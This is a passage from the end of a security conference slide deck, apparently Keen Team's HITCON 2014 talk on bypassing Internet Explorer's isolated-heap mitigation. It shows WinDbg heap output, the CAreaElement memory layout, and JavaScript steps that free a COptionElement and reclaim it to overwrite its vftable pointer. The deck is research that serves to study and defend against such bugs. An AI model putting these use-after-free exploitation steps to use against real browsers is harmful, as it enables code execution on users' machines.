0:007> !heap -‐p -‐h poi(MSHTML!g_hIsolatedHeap) … * 03ad6650 0200 000b [00] 03ad6658 00ff8 -‐ (busy) // UserBlocks1 03ad6668 000e 0200 [00] 03ad6670 00064 -‐ (busy) MSHTML!CAreaElement::`vftable' … * 03ad7a50 0200 0080 [00] 03ad7a58 00ff8 -‐ (busy) // UserBlocks2 03ad7a68 000b 0200 [00] 03ad7a70 0004c -‐ (busy) MSHTML!COptionElement::`vftable' … VirtualAllocdBlocks @ 3ac00a0
57
![Page 58: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/58.jpg)
CAreaElement
• 0x64 bytes • +0x4c RECT • +0x4c leR • +0x50 top • +0x54 right • +0x58 boeom
58
![Page 59: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/59.jpg)
CAreaElement
• shape = "rect" • coords = "1,2,3,4"
59
![Page 60: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/60.jpg)
CAreaElement
• +0x4c 1 • +0x50 2 • +0x54 3 • +0x58 4
60
![Page 61: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/61.jpg)
Control vRable of COp-onElement
var i; // index of Use-‐After-‐Free COptionElement var j; // index of corresponding CAreaElement for (i = 0; i < Math.floor((0x1000 -‐ 0x8 -‐ 0x10) / (0x50 + 0x8)); i++) { var r = ((0x50 + 0x8) * i + 0x0) % (0x68 + 0x8); j = Math.floor(((0x50 + 0x8) * i + 0x0) / (0x68 + 0x8)); if (r >= 0x4c && r <= 0x58) break; } // i = 1 // j = 0
61
![Page 62: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/62.jpg)
New Step 2
… var UserBlocks1 = new Array(); for (var i = 0; i < Math.floor((0x1000 -‐ 0x8 -‐ 0x10) / (0x50 + 0x8)); i++) { if (i == 1) { // Create Use-‐After-‐Free COptionElement } UserBlocks1[i] = document.createElement("option"); } …
62
![Page 63: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/63.jpg)
New Step 3
// Free Use-‐After-‐Free COptionElement for (var i = 0; i < Math.floor((0x1000 -‐ 0x8 -‐ 0x10) / (0x50 + 0x8)); i++) { if (i != 1) UserBlocks1[i] = null; } CollectGarbage(); CollectGarbage2();
63
![Page 64: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/64.jpg)
New Step 5
UserBlocks1[0].shape = "rect" UserBlocks1[0].coords = "1,2,3,83886116" // 0x05000024 => vftable of Use-‐After-‐Free COptionElement
64
![Page 65: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/65.jpg)
65
Thanks
Liang Chen wu shi
humeafo
![Page 66: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/66.jpg)
![Page 67: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/67.jpg)
![Page 68: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/68.jpg)
![Page 69: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/69.jpg)
END
Thanks